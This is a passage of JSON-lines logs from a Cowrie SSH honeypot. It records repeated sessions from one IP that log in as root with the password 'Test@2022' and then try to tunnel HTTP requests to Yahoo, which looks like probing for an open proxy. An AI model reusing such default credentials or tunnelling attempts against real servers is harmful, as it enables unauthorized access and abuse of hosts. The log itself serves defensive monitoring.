.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:02.337744Z","src_ip":"213.209.150.239","session":"b3d017abb231"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:02.577309Z","src_ip":"213.209.150.239","session":"b3d017abb231"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":2354,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:2354","sensor":"my-vps","timestamp":"2025-08-26T01:00:02.627874Z","session":"b3d017abb231"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:02.676708Z","src_ip":"213.209.150.239","session":"b3d017abb231"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":19192,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:19192","sensor":"my-vps","timestamp":"2025-08-26T01:00:02.815202Z","session":"b3d017abb231"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:02.865654Z","src_ip":"213.209.150.239","session":"b3d017abb231"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:02.915501Z","src_ip":"213.209.150.239","session":"b3d017abb231"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7017,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d4f5782c354","protocol":"ssh","message":"New connection: 213.209.150.239:7017 (1.2.3.4:22) [session: 8d4f5782c354]","sensor":"my-vps","timestamp":"2025-08-26T01:00:02.962066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:02.963471Z","src_ip":"213.209.150.239","session":"8d4f5782c354"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:03.012995Z","src_ip":"213.209.150.239","session":"8d4f5782c354"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:03.269492Z","src_ip":"213.209.150.239","session":"8d4f5782c354"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":23194,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:23194","sensor":"my-vps","timestamp":"2025-08-26T01:00:03.318961Z","session":"8d4f5782c354"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:03.366832Z","src_ip":"213.209.150.239","session":"8d4f5782c354"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":24769,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:24769","sensor":"my-vps","timestamp":"2025-08-26T01:00:03.509861Z","session":"8d4f5782c354"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:03.557566Z","src_ip":"213.209.150.239","session":"8d4f5782c354"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:03.606543Z","src_ip":"213.209.150.239","session":"8d4f5782c354"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7063,"dst_ip":"1.2.3.4","dst_port":22,"session":"dad3c1588da2","protocol":"ssh","message":"New connection: 213.209.150.239:7063 (1.2.3.4:22) [session: dad3c1588da2]","sensor":"my-vps","timestamp":"2025-08-26T01:00:03.655930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:03.657388Z","src_ip":"213.209.150.239","session":"dad3c1588da2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:03.705101Z","src_ip":"213.209.150.239","session":"dad3c1588da2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:03.942216Z","src_ip":"213.209.150.239","session":"dad3c1588da2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":32227,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:32227","sensor":"my-vps","timestamp":"2025-08-26T01:00:03.991461Z","session":"dad3c1588da2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:04.039436Z","src_ip":"213.209.150.239","session":"dad3c1588da2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":15399,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:15399","sensor":"my-vps","timestamp":"2025-08-26T01:00:04.177992Z","session":"dad3c1588da2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:04.225642Z","src_ip":"213.209.150.239","session":"dad3c1588da2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:04.274548Z","src_ip":"213.209.150.239","session":"dad3c1588da2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7100,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7a8fb06e9d3","protocol":"ssh","message":"New connection: 213.209.150.239:7100 (1.2.3.4:22) [session: b7a8fb06e9d3]","sensor":"my-vps","timestamp":"2025-08-26T01:00:04.330169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:04.330931Z","src_ip":"213.209.150.239","session":"b7a8fb06e9d3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:04.388260Z","src_ip":"213.209.150.239","session":"b7a8fb06e9d3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:04.671986Z","src_ip":"213.209.150.239","session":"b7a8fb06e9d3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":11682,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:11682","sensor":"my-vps","timestamp":"2025-08-26T01:00:04.731055Z","session":"b7a8fb06e9d3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:04.787997Z","src_ip":"213.209.150.239","session":"b7a8fb06e9d3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":364,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:364","sensor":"my-vps","timestamp":"2025-08-26T01:00:04.943239Z","session":"b7a8fb06e9d3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:05.000182Z","src_ip":"213.209.150.239","session":"b7a8fb06e9d3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:05.060754Z","src_ip":"213.209.150.239","session":"b7a8fb06e9d3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7158,"dst_ip":"1.2.3.4","dst_port":22,"session":"03ffcb345fe0","protocol":"ssh","message":"New connection: 213.209.150.239:7158 (1.2.3.4:22) [session: 03ffcb345fe0]","sensor":"my-vps","timestamp":"2025-08-26T01:00:05.105978Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:05.106935Z","src_ip":"213.209.150.239","session":"03ffcb345fe0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:05.154701Z","src_ip":"213.209.150.239","session":"03ffcb345fe0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:05.390175Z","src_ip":"213.209.150.239","session":"03ffcb345fe0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":28246,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:28246","sensor":"my-vps","timestamp":"2025-08-26T01:00:05.438391Z","session":"03ffcb345fe0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:05.485958Z","src_ip":"213.209.150.239","session":"03ffcb345fe0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":2119,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:2119","sensor":"my-vps","timestamp":"2025-08-26T01:00:05.621675Z","session":"03ffcb345fe0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:05.669080Z","src_ip":"213.209.150.239","session":"03ffcb345fe0"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:05.717663Z","src_ip":"213.209.150.239","session":"03ffcb345fe0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7200,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ccf7fd86a03","protocol":"ssh","message":"New connection: 213.209.150.239:7200 (1.2.3.4:22) [session: 0ccf7fd86a03]","sensor":"my-vps","timestamp":"2025-08-26T01:00:05.763880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:05.765034Z","src_ip":"213.209.150.239","session":"0ccf7fd86a03"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:05.812447Z","src_ip":"213.209.150.239","session":"0ccf7fd86a03"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:06.048903Z","src_ip":"213.209.150.239","session":"0ccf7fd86a03"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":32136,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:32136","sensor":"my-vps","timestamp":"2025-08-26T01:00:06.097396Z","session":"0ccf7fd86a03"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:06.145193Z","src_ip":"213.209.150.239","session":"0ccf7fd86a03"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":25492,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:25492","sensor":"my-vps","timestamp":"2025-08-26T01:00:06.281635Z","session":"0ccf7fd86a03"}
